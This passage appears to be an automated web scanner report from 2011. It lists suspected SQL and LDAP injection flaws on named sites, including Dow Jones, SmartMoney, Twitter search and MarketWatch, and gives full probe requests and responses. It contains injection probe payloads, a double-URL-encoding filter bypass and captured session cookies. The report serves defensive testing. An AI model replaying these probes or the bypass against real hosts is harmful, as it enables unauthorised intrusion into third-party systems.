Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jn1gkyeJ1WKAlCZEVc4LTWOfoR5KzzgHeAS7hqzHSMuCOpjB1psKNSFmvBLqyWuIDgDAgaXM5JpHh4udrWFoym8ywkMe0Kn1wT4dLyW3KPKmkY0ThNgc2x8Up3Hy0uGQv9XS9/uFl0bfYMMFdjbMvt7YuOHgtMBideElnGiWCHyeqIKhFqXhGr1Grw+cB8rZ2gMClHyV6alKgEA6Q/COnKjWRwmLlfQpesPEkWCyHOtj4AjkN3akBjLIeCZ2wv622Hx2afLIrdjCrUT0iM3fHP3tcn7/btTMnxrruETy4/we6WQEWWvjTvDv0yd5N8cR2Rbco2+Tilbkww6BqH43XkmL42Wt2JNXOnSflhuUiOMtvHdQCGYMe6T5mY/mNSsdyklww8Kud0eb4fFljXNTbUtdtuWgkxBCPo6dkWsHrflR2tFRNtkRtZ+g0aJTSDkInSE/Czbu3gdnyOsSEfwpOaxw21Vu2x8UWKtlYKeQjDdX0rQgSZq/5qExOPsga0vr//N+mkUjL0RBsNjgxkht+R1IEJxOY1QdHJZK28NiEOyihHRnn6Ho29zPNKwFGORx; geo=US; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:31:03 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 0
Content-Type: text/html


1.89. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358?[AQB]&ndh=1&t=14/4/2011%205%3A12%3A9%206%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&g=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&r=http%3A//ad.doubleclick.net/adi/interactive.wsj.com/news_front%3B%21category%3D%3Bpage%3Darticle%3Bmsrc%3DWSJ_hp_LEFTTopStories%3B%3Bmc%3Db2pfreezone%3Btile%3D2%3Bsz%3D571x47%3Bord%3D4387438743874387%3B&cc=USD&ch=Online%20Journal&server=commerce.wsj.com&events=event12&c1=Customer%20Resources&h1=Online%20Journal%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo%2Chttp%3A//commerce.wsj.com/auth/login&c2=WSJ_Login&h2=Online%20Journal%2Cmarketing%20and%20support%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c3=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h3=Online%20Journal%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v4=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h4=Online%20Journal%2CWSJ_Login%2CCustomer%20Resources&c5=http%3A//commerce.wsj.com/auth/login&v5=login_artpreview&h5=Online%20Journal%2C%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c6=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&c7=off&c8=Customer%20Resources&c9=free&c10=login_artpreview&v11=Online%20Journal&c19=marketing%20and%20support&c22=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v25=WSJ_WSJ_Login_WSJ_Customer%20Resources_WSJ_Login_Login&c26=WSJ_Customer%20Resources_WSJ_Login_Login&c27=WSJ_free&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/login?mg=inert-wsj&mod=login_artpreview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 10:31:11 GMT
Server: Omniture DC/2.0.0
Content-Length: 444
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358 wa
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358?[AQB]&ndh=1&t=14/4/2011%205%3A12%3A9%206%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&g=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&r=http%3A//ad.doubleclick.net/adi/interactive.wsj.com/news_front%3B%21category%3D%3Bpage%3Darticle%3Bmsrc%3DWSJ_hp_LEFTTopStories%3B%3Bmc%3Db2pfreezone%3Btile%3D2%3Bsz%3D571x47%3Bord%3D4387438743874387%3B&cc=USD&ch=Online%20Journal&server=commerce.wsj.com&events=event12&c1=Customer%20Resources&h1=Online%20Journal%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo%2Chttp%3A//commerce.wsj.com/auth/login&c2=WSJ_Login&h2=Online%20Journal%2Cmarketing%20and%20support%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c3=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h3=Online%20Journal%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v4=WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&h4=Online%20Journal%2CWSJ_Login%2CCustomer%20Resources&c5=http%3A//commerce.wsj.com/auth/login&v5=login_artpreview&h5=Online%20Journal%2C%2CCustomer%20Resources%2CWSJ_Login%2CWSJ_Customer%20Resources_WSJ_Login_Login%2CWSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&c6=http%3A//commerce.wsj.com/auth/login%3Fmg%3Dinert-wsj%26mod%3Dlogin_artpreview&c7=off&c8=Customer%20Resources&c9=free&c10=login_artpreview&v11=Online%20Journal&c19=marketing%20and%20support&c22=WSJ_Customer%20Resources_WSJ_Auth_WSJ/Barrons_Login_Page_Sub_with_Promo&v25=WSJ_WSJ_Login_WSJ_Customer%20Resources_WSJ_Login_Login&c26=WSJ_Customer%20Resources_WSJ_Login_Login&c27=WSJ_free&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/login?mg=inert-wsj&mod=login_artpreview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 10:31:11 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.90. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sbklivequoteserverdl.smartmoney.com
Path:   /livequote/tokenJSON

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /livequote'/tokenJSON?list=NLS:$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery151023836345155723393_1305368029705&_=1305368029780 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1307960020151%26vn%3D1; s_dbfe=1305368020152; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjsm%3D%2526pid%253DSM_Home%252520Page_0_0_SH_0001%2526pidt%253D1%2526oid%253Dhttp%25253A//www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/%2526ot%253DA; __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.2.10.1305368018

Response 1

HTTP/1.0 500 Internal Server Error
Server: JRun Web Server
Date: Sat, 14 May 2011 10:20:30 GMT
Connection: close
Content-Type: text/html

<head><title>JRun Servlet Error</title></head><h1>500 Internal Server Error</h1><body>
No web application defined to service /livequote'/tokenJSON</body>

Request 2

GET /livequote''/tokenJSON?list=NLS:$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery151023836345155723393_1305368029705&_=1305368029780 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1307960020151%26vn%3D1; s_dbfe=1305368020152; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjsm%3D%2526pid%253DSM_Home%252520Page_0_0_SH_0001%2526pidt%253D1%2526oid%253Dhttp%25253A//www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/%2526ot%253DA; __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.2.10.1305368018

Response 2

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Date: Sat, 14 May 2011 10:20:40 GMT
nnCoection: close
Content-Length: 0


1.91. http://search.twitter.com/search.json [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /search.json?q=%22next%20top%20model%22%20OR%20%22nexttopmodel%22%20OR%20%22antm%22%20OR%20%22%2523antm%22&page=1&rpp=30&&&callback=twitterlib1305376448027 HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%2527
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1; __utmc=43838368; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCN5zDe4vAToMY3NyZl9pZCIlYWM1YmY4MDQz%250AZTBmM2ZjNjEwY2JjNWVhMTc3YzFlNTAiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkYWRm%250ANDJhZTBkOTc0ZTVmY2ZhMjc5OTY5YmVjYTdiZg%253D%253D--1d8040b8314f051f527cc09828e06b740baadb22

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:35:33 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 2087599046
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaz-23-sr2.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 12:40:33 GMT
Connection: close
Content-Length: 84

twitterlib1305376448027({"error":"You have been rate limited. Enhance your calm."});

Request 2

GET /search.json?q=%22next%20top%20model%22%20OR%20%22nexttopmodel%22%20OR%20%22antm%22%20OR%20%22%2523antm%22&page=1&rpp=30&&&callback=twitterlib1305376448027 HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%2527%2527
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1; __utmc=43838368; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCN5zDe4vAToMY3NyZl9pZCIlYWM1YmY4MDQz%250AZTBmM2ZjNjEwY2JjNWVhMTc3YzFlNTAiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkYWRm%250ANDJhZTBkOTc0ZTVmY2ZhMjc5OTY5YmVjYTdiZg%253D%253D--1d8040b8314f051f527cc09828e06b740baadb22

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:35:33 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 1874525692
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaw-31-sr4.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 12:40:33 GMT
Connection: close
Content-Length: 18300

twitterlib1305376448027({"results":[{"from_user_id_str":"291888395","profile_image_url":"http://a3.twimg.com/profile_images/1332411520/4_normal.JPG","created_at":"Sat, 14 May 2011 12:35:11 +0000","fro
...[SNIP]...

1.92. http://www.fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?pid=14' HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.5.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17165

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

2. LDAP injection  previous  next
There are 7 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [Pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The Pos parameter appears to be vulnerable to LDAP injection attacks.

The payloads 48213c807c01c96)(sn=* and 48213c807c01c96)!(sn=* were each submitted in the Pos parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /BurstingPipe/adServer.bs?cn=bsr&FlightID=2344126&Page=&PluID=0&Pos=48213c807c01c96)(sn=* HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fins.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPk0cOm00001jxYPaMPg0doZ00001; B3=9xx40000000001uD9sKa0000000001uD9fOJ0000000001uC

Response 1

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-28039/Type-0/6f381ac2-b744-46b5-8b0b-b6007baa08c9.gif
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPo0aMI00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_48213c807c01c96)(sn=*=4844349
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:16:34 GMT
Connection: close

Request 2

GET /BurstingPipe/adServer.bs?cn=bsr&FlightID=2344126&Page=&PluID=0&Pos=48213c807c01c96)!(sn=* HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fins.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPk0cOm00001jxYPaMPg0doZ00001; B3=9xx40000000001uD9sKa0000000001uD9fOJ0000000001uC

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-28039/Type-0/6f381ac2-b744-46b5-8b0b-b6007baa08c9.gif
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPo0aMI00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:16:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_48213c807c01c96)!(sn=*=4844349
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:16:34 GMT
Connection: close


2.2. http://i1.marketwatch.com/MW5/content/business/css/marketwatch.member.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i1.marketwatch.com
Path:   /MW5/content/business/css/marketwatch.member.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/content/business/css/marketwatch.member.css?stop=it HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:12:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /*)!(sn=*/content/business/css/marketwatch.member.css?stop=it HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:12:54 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

2.3. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /MW5/*)(sn=*/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
